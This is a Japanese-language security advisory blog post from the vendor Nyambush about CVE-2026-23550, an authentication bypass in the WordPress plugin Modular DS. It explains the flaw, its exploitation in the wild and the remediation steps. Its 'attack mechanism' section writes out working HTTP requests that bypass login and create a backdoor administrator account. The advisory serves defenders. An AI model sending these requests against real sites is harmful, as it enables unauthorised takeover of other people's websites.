Nyambush
CVSS 10.0Critical

CVE-2026-23550: Modular DSの認証バイパス(CVSS 10.0)

概要

  • CVE: CVE-2026-23550
  • 影響プラグイン: Modular DS(WordPress連携コネクタープラグイン)
  • 影響バージョン: 2.5.1以前のすべてのバージョン
  • 修正バージョン: 2.5.2
  • CVSS: 10.0(Critical - 最高スコア)
  • 認証: 不要(未認証で攻撃可能)
  • 種別: 認証バイパス / 未認証権限昇格
  • 野外悪用: あり(2026年1月13日以降、攻撃を確認)

CVSSスコアが最高値の10.0に達し、かつ実際に野外での悪用が確認されている、極めて深刻な脆弱性です。Modular DSはWordPressサイトとModularサービスを連携させるコネクタープラグインで、約4万サイトに導入されています。攻撃者はログインAPIへの単純なHTTP GETリクエストだけで管理者権限を取得でき、脆弱性の公開情報が広まってから数時間以内に実際の攻撃が検出されました。

何が起きたか

Modular DSプラグインは、WordPressサイトをModularのサービスに接続するためのログインルート /login/{modular_request} を提供しています。このルートはプラグイン内部で「ダイレクトリクエスト」モードでも動作するよう実装されていましたが、そのモードへの切り替え条件の検証が根本的に欠落していました。

具体的には、リクエストに origin=mo パラメータと任意の type パラメータを含めるだけで、認証レイヤー全体がスキップされる実装になっていました。プラグインはこの組み合わせを「信頼できる内部リクエスト」として誤認識し、そのまま攻撃者をWordPressの管理者として自動ログインさせてしまいます。

この脆弱性が特に危険なのは、悪用に一切の事前知識や認証情報を必要とせず、極めてシンプルなHTTPリクエスト1回で管理者権限が奪取できる点です。

攻撃の仕組み

攻撃の手順は次の通りで、技術的なスキルをほとんど必要としません。

ステップ1: ログインAPIへのGETリクエスト

GET /api/modular-connector/login/?origin=mo&type=any HTTP/1.1
Host: target-wordpress-site.com

このリクエストだけで、プラグインの認証チェックが完全にバイパスされます。type パラメータの値は何でも構いません。サーバーは攻撃者を管理者として認証し、セッションクッキーを発行します。

ステップ2: 管理者ユーザーの作成

POST /wp-admin/user-new.php HTTP/1.1
Host: target-wordpress-site.com
Cookie: [step1で取得したセッション]

action=createuser&user_login=backdoor&user_pass=P@ssw0rd&role=administrator

攻撃者はセッション取得後、すぐに新しい管理者アカウントを作成します。これにより、プラグインを後から削除・修正しても攻撃者のアクセスが維持されます。

実際の攻撃では、ステップ1とステップ2の間に要した時間が数分以内であることが観測されており、完全に自動化されたスクリプトによる攻撃であることが示されています。

実際の被害

2026年1月13日から、この脆弱性を悪用する攻撃が世界中で確認されました。

  • 約4万サイトが脆弱なバージョンのModular DSを導入しており、全サイトが攻撃対象となった
  • 脆弱性に関する情報が広まってから数時間以内に攻撃が検出された。これはCVSS 10.0の脆弱性が公開されると即座に攻撃が始まることを改めて示すものです
  • 攻撃者の典型的な行動パターンは、管理者アカウントの作成、バックドアの設置、スパムコンテンツの挿入、そして場合によってはランサムウェアのインストールでした
  • 侵害されたサイトの多くで、正規の管理者はすぐに異変に気づかず、時間が経過してから被害を発見するケースが報告されています
  • 管理者パスワードや2FAの設定に関わらず、プラグインが有効であれば攻撃が成立するため、従来の認証強化策が完全に無効化されました

修正と教訓

修正: バージョン2.5.2で修正されています。/login/{modular_request} ルートのダイレクトリクエストモードに対して、リクエスト元の正当性を検証する処理が追加されました。origin=mo パラメータだけでは認証バイパスが成立しないよう、内部的な署名検証またはトークン検証が実装されています。

直ちに取るべき対応:

  1. Modular DSをバージョン2.5.2以降に即座にアップデートする
  2. WordPress管理画面のユーザー一覧を確認し、見覚えのない管理者アカウントを削除する
  3. サーバーのアクセスログを精査し、/api/modular-connector/login/ への不審なアクセスがないか調査する
  4. FTPやSSH等のサーバーアクセスで、バックドアファイルが設置されていないか確認する

教訓:

  1. CVSS 10.0の脆弱性は即座に悪用される: 情報公開から数時間以内に自動化された攻撃が始まる。パッチの適用は発見次第、当日中に実施すべきです
  2. 認証バイパスはすべての防御を無効化する: どれだけ強力なパスワードを使っていても、認証そのものがスキップされれば意味がありません
  3. プラグインの内部ルートの危険性: サードパーティ連携のための特殊なルートは、徹底的な認証検証が必要です。信頼できるリクエストの判定を単純なパラメータ値だけに依存することは致命的なリスクです
  4. 侵害後の痕跡確認: バックドアは削除されたプラグインよりも長く残り続けます。アップデートだけでは不十分で、侵害の痕跡調査が必須です

Nyambushでの検出

NyambushはWordPressサイトにインストールされているプラグインとそのバージョンを継続的にスキャンし、CVEデータベースと照合します。Modular DSのバージョン2.5.1以前が検出された場合、CVSS 10.0の重大度とともに即座にアラートを発します。

特にCVSS 9.0以上の重大脆弱性については、定期スキャンとリアルタイム通知の組み合わせが欠かせません。脆弱性の公開から攻撃開始までの猶予が数時間しかない状況では、手動でのバージョン確認では間に合いません。

Nyambushのスキャン結果でプラグインに関する警告が表示された場合、それはすでに攻撃者がスキャンを始めているサインです。警告の確認と対応を、その日のうちに完了させてください。

この記事をシェア:Xでポスト

あなたのドメインは安全ですか?

Nyambushで今すぐ無料スキャンして、セキュリティリスクをチェックしましょう。

記事一覧に戻る